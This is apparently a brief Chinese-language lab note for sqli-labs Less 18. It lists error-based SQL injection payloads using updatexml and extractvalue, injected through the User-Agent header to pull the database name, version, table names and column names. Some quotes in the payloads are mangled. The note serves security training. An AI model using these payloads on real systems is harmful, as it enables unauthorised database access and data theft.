sqli-labs less 18

reader-l ‘or updatexml(1,concat(’#’,(select user()),1),1)

先用这句话简单的判断后台insert 语句

$insert="INSERT INTO security.uagents (uagent, ip_address, username) VALUES ('$uagent’, ‘$IP’, $uname)";

所以用以下语句进行注入猜解

user-agent:reader-l ’ or updatexml(1,concat(’#’,(database())),0),’’,’’)#

reader-l ‘or updatexml(1,concat(’#’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1 ),’#’),0),1)#

reader-l ‘or updatexml(1,concat(’#’,(select concat(table_name) from information_schema.tables where table_schema=‘security’ limit 0,1 ),’#’),0),1)#

reader-l ‘or updatexml(1,concat(’#’,(select concat(column_name) from information_schema.columns where table_name=‘users’ limit 0,1 ),’#’),0),1)#

reader-l ’ or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0),’’,’’)#

'and extractvalue(1,concat(0x7e,(select @@version),0x7e)) and ‘1’ = '1

reader-l 'and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),0x7e)) and ‘1’ = '1

有一个大佬讲得很详细，这是他的链接 https://www.jianshu.com/p/7494c1027abf